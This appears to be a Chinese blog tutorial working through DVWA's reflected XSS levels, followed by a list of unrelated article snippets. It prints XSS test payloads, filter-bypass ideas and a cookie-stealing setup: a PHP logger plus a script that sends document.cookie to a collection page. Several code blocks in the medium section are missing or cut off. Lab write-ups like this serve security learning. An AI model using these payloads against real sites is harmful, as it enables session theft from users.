dvwa,xss反射型lowmedium
xss,反射型,low&&medium
- low
- 发现xss
- 本地搭建
- 实操
- medium
- 作为初学者的我第一次接触比较浅的绕过思路
- high
low
发现xss
本关无过滤
<script>alert(/xss/)</script>
//或
<script>confirm(/xss/)</script>
//或
<script>prompt(/xss/)</script>
出现弹框则存在xss,其中alert()confirm()prompt()为弹框函数
本地搭建
在www目录下放置cookie.php内容如下
<?php$cookie=$_GET['cookie'];//将get请求参数存储到cookie变量中file_put_contents('cookie.txt',$cookie);//把偷取的用户cookie写到cookie.txt文件中。?>
js代码如下
<script>document.location='http://127.0.0.1/cookie.php/?cookie='+document.cookie;</script>//document.location将页面的内容指定到指定位置。
再在www目录下放置cookie.txt文件用于存放盗取的cookie
实操
目前txt文件什么也没有,我们执行js代码
没有报错解析成功,可以看到url地址栏中有用户的cookie此cookie已经储存进了攻击者的txt文件
盗取成功
medium
关对
作为初学者的我第一次接触比较浅的绕过思路
Xss反射型
(一):判断是否存在xss
1:无过滤
使用弹窗函数编写js代码,成功弹框
输入其他标签:(未知领域)
输入<img src=x οnerrοr=alert(/xss/)>,成功弹窗
3:那尝试使用大小写混淆
4:或者双写绕过
<sc
5:还有很多方法自己探究吧相信在以后会掌握更多方法
(二):Js代码如下
(三):盗取cookie
本地www目录下搭建cookie.php
内容如下
再创建cookie.txt文档用于存储盗取的cookie
high
尝试别的语言就可以执行
<img src=1 onerror=alert(1)>
相关文章:
dvwa,xss反射型lowmedium
xss,反射型,low&&medium low发现xss本地搭建实操 medium作为初学者的我第一次接触比较浅的绕过思路high low 发现xss 本关无过滤 <script>alert(/xss/)</script> //或 <script>confirm(/xss/)</script> //或 <scr…...
从云计算到物联网:虚拟化技术的演变与嵌入式系统的融合
文章目录 一、硬件性能提升:摩尔定律与嵌入式虚拟化二、CPU多核技术:为嵌入式虚拟化提供支持三、业务负载整合:嵌入式虚拟化的核心需求四、降低硬件成本:虚拟化技术的经济效益五、软件重用与移植:虚拟化技术的优势六、…...
linux 文件查看 head 、 cat 、 less 、tail 、grep
查看文件详细信息 stat 文件 cat 》》适合显示小文件【行数比较少】,如果行数较多,屏幕显示不完整(如果虚拟操作,是无法上下键的,或者滚动鼠标的,第三方 xsheel,crt 可以方向键查看…...
)
13.2 Web与Servlet进阶(❤❤)
13.2 Web与Servlet进阶 1. 请求与响应1.1 URL与URI1.2 HTTP请求的结构1. 结构2.后端获取访问工具类型:getHeader().toLowerCase方法1.3 响应的结构1. 结构2. 响应常见状态码3. 后端设置响应参数4. 响应的ContentType作用1.4 请求转发与响应重定向应用1. 请求转发:getRequestDis…...
)
记录解决报错--vue前后端分离,接口401(Unauthorized)
1.场景 前端访问不了后端接口。报错401。 2.解决步骤 ①在页面console.log(111)查看走到代码的位置没有。(走到了,没问题) ②查看vue.config.js配置。这段配置就是vue访问api的url。(没问题) devServer: {port: 80…...
【笔记】Android 常用编译模块和输出产物路径
模块&产物路径 具体编译到软件的路径要看编译规则的分区,代码中模块编译输出的产物基本对应。 Android 代码模块 编译产物路径设备adb路径Comment 模块device/mediatek/system/common/ 资源overlay/telephony/frameworks/base/core 文件举例res/res/values-m…...
部署私有知识库项目FastGPT
FastGPT 是一个基于 LLM 大语言模型的知识库问答系统,提供开箱即用的数据处理、模型调用等能力。同时可以通过 Flow 可视化进行工作流编排,从而实现复杂的问答场景。 项目文档: [快速了解 FastGpt | FastGptFastGPT 是一个基于 LLM 大语言模型的知识库问答系统,提供开箱即…...
【2024-02-02】华为秋招笔试三道编程题解
恭喜发现宝藏!搜索公众号【TechGuide】回复公司名,解锁更多新鲜好文和互联网大厂的笔经面经。 作者TechGuide【全网同名】 订阅专栏: 【专享版】2024最新大厂笔试真题解析,错过必后悔的宝藏资源! 第一题:找…...
银行数据仓库体系实践(8)--主数据模型设计
主数据区域中保留了数据仓库的所有基础数据及历史数据,是数据仓库中最重要的数据区域之一,那主数据区域中主要分为近源模型区和整合(主题)模型区。上一节讲到了模型的设计流程如下图所示。那近源模型层的设计在第2.3和3这两个步骤…...
vue在main.js中引入三方插件不生效的原因
有的时候需要比较复杂的功能,但是自己实现比较复杂的话,可以引入第三方插件.如果这个第三方插件需要全局都使用的话,可以在main.js中进行引入. 比如router elementplus之类的. import { createApp } from vue import ElementPlus from element-plus import element-plus/dist/…...
chatgpt搭建
chatgpt两步搭建大法 部署docker环境 下载docker curl -fsSL https://get.docker.com -o get-docker.sh安装docker sh get-docker.sh运行docker服务 systemctl start docker查看运行状态 systemctl status docker设置docker开机自启 systemctl enable docker部署chatgpt…...
vue基本理解
1、js闭包,作用?? 闭包是指在一个函数内部,可以访问外部函数的变量,即使外部函数已经执行完毕。闭包的作用有: 保护变量:闭包可以保护函数内部的变量,使其不受外部环境的影响。实现…...
NLP入门系列—Attention 机制
NLP入门系列—Attention 机制 Attention 正在被越来越广泛的得到应用。尤其是 [BERT]火爆了之后。 Attention 到底有什么特别之处?他的原理和本质是什么?Attention都有哪些类型?本文将详细讲解Attention的方方面面。 Attention 的本质是什…...
实习记录——第十天
今天啥也不想说了,ctf里面还有道题目还没做,这里就不写了,把日报奉上,懂得都懂: 2.2日总结: 早上对xx银行的招聘网站做了渗透测试,对招聘网点赞处做重放看是否会多次点赞,对收藏处考…...
Java实现学生信息管理系统:从Excel中提取数据的实用方法
在Java中实现学生信息管理系统并从Excel中读取数据,通常适用于以下场景: 数据迁移和集成:如果你有一个现存的学生信息管理系统,该系统可能使用数据库或其他存储方式,但你想将这些数据迁移到新的系统。Excel文件可能提…...
幻兽帕鲁服务器怎么一键删除游戏存档?(阿里云服务器)
目前通过阿里云一键部署的幻兽帕鲁服务器,已经支持一键清除游戏存档了,已经不需要你再去手动找到游戏存档文件夹,去手动删除了。首先打开阿里云的“计算巢服务器”控制台 进入之后,选择你的幻兽帕鲁服务实例,点击进入详…...
Cambalache in Ubuntu
文章目录 前言apt install flatpak这很ok后记 前言 gtkmm4相比gtkmm3有很多改革, 代码也干净了许多, 但在windows上开发 有ui设计器那自然方便很多, 但glade又不支持gtkmm4, windows上装Cambalache很是困难. 各种问题都找不到答案.于是 我用VMware虚拟机Ubuntu20.xx安装Cambal…...
洛谷P1540 机器翻译
参考代码 #include<iostream> #include<queue> using namespace std; int nums[1010]; int main(){queue<int> q;int M,N;cin>>M>>N;int res0;while(N--){int tmp;cin>>tmp;if(nums[tmp]1)continue;if(q.size()<M){q.push(tmp);res;nu…...
python-自动化篇-运维-可视化-绘图库-matplotlib
文章目录 Matplotlibmatplotlib开发环境搭建绘制基础绘制直线绘制折线设置标签文字和线条粗细绘制一元二次方程的曲线yx^2绘制正弦曲线和余弦曲线散点图绘制柱状图绘制饼状图绘制直方图等高线图绘制三维图 Matplotlib Matplotlib 是一个Python的 2D绘图库。通过 Matplotlib&am…...
【译】在 Mac 上加速 PyTorch 训练
写在前面 为什么突然深度介入大模型领域了 因为最近在评估大模型用于行业应用,通过 OpenCompass 排行榜了解到了很多大模型,像文心一言是自己深度试用过的,趁着这次评估,也体验或者通过其他团队的介绍了解了通义千问、清华智谱、…...
)
别再死记硬背公式了!用Matlab/Simulink手把手教你调PMSM的电流环PI参数(附模型)
永磁同步电机电流环PI参数整定实战:从理论推导到Simulink验证 在电机控制领域,永磁同步电机(PMSM)因其高效率、高功率密度等优势,已成为工业驱动和电动汽车的主流选择。而磁场定向控制(FOC)作为PMSM的核心控制策略,其性能很大程度…...
Open UI5 源代码解析之886:OverflowToolbarButton.js
源代码仓库: https://github.com/SAP/openui5 源代码位置:src\sap.m\src\sap\m\OverflowToolbarButton.js OverflowToolbarButton.js 深度解析与项目作用说明 文件定位与总体价值 这个文件定义了一个控件:sap.m.OverflowToolbarButton。从代码体量看,它并不长,却属于…...
)
TCN实战:用Python和Keras搭建时序分类模型(附MNIST代码)
TCN实战:用Python和Keras搭建时序分类模型(附MNIST代码) 时序数据分类一直是机器学习领域的核心挑战之一。传统RNN架构虽然广泛应用,但其训练复杂度高、并行性差的缺陷日益凸显。2018年提出的时域卷积网络(TCN…...
Flutter 导航系统:构建流畅的页面跳转
Flutter 导航系统:构建流畅的页面跳转掌握 Flutter 导航系统的核心概念和最佳实践。一、导航的重要性 作为一名追求像素级还原的 UI 匠人,我深知导航在应用开发中的重要性。良好的导航系统能够提供清晰的用户路径,增强用户体验,让…...
C++性能调优第一步:手把手教你用QueryPerformanceCounter和chrono精准测量微秒级函数耗时
C性能调优实战:微秒级耗时测量的艺术与科学 在追求极致性能的世界里,每一微秒都至关重要。高频交易系统中,1微秒的延迟可能意味着数百万美元的损失;游戏引擎里,帧间时间的细微波动会导致画面卡顿;实时音视频…...
Linux内核中的驱动程序开发高级话题
Linux内核中的驱动程序开发高级话题 引言 驱动程序是Linux内核中负责与硬件设备交互的重要组成部分,它为操作系统和硬件之间提供了桥梁。随着硬件技术的发展和系统复杂性的增加,驱动程序开发面临着越来越多的挑战。本文将深入探讨Linux内核中驱动程序开发…...
Open UI5 源代码解析之878:ObjectAttribute.js
源代码仓库: https://github.com/SAP/openui5 源代码位置:src\sap.m\src\sap\m\ObjectAttribute.js ObjectAttribute.js 深度分析与项目作用说明 文件定位与整体结论 ObjectAttribute.js 位于 sap.m 库内部,是 sap.m.ObjectAttribute 控件的核心实现文件。它的职责并不…...
GHelper:重新定义华硕设备的性能控制体验 | 从技术原理到实战应用的深度解析
GHelper:重新定义华硕设备的性能控制体验 | 从技术原理到实战应用的深度解析 【免费下载链接】g-helper Lightweight, open-source control tool for ASUS laptops and ROG Ally. Manage performance modes, fans, GPU, battery, and RGB lighting across Zephyrus,…...
数字电路设计终极指南:用Logisim-Evolution从零搭建你的第一个逻辑系统
数字电路设计终极指南:用Logisim-Evolution从零搭建你的第一个逻辑系统 【免费下载链接】logisim-evolution Digital logic design tool and simulator 项目地址: https://gitcode.com/gh_mirrors/lo/logisim-evolution 数字电路设计与仿真是电子工程和计算机…...
intv_ai_mk11快速部署教程:30秒获取GPU服务地址,5分钟完成首次高质量对话
intv_ai_mk11快速部署教程:30秒获取GPU服务地址,5分钟完成首次高质量对话 1. 什么是intv_ai_mk11 intv_ai_mk11是一款基于Llama架构的AI对话助手,拥有7B参数规模,运行在专业的GPU服务器上。它能像一位知识渊博的朋友一样与你交流…...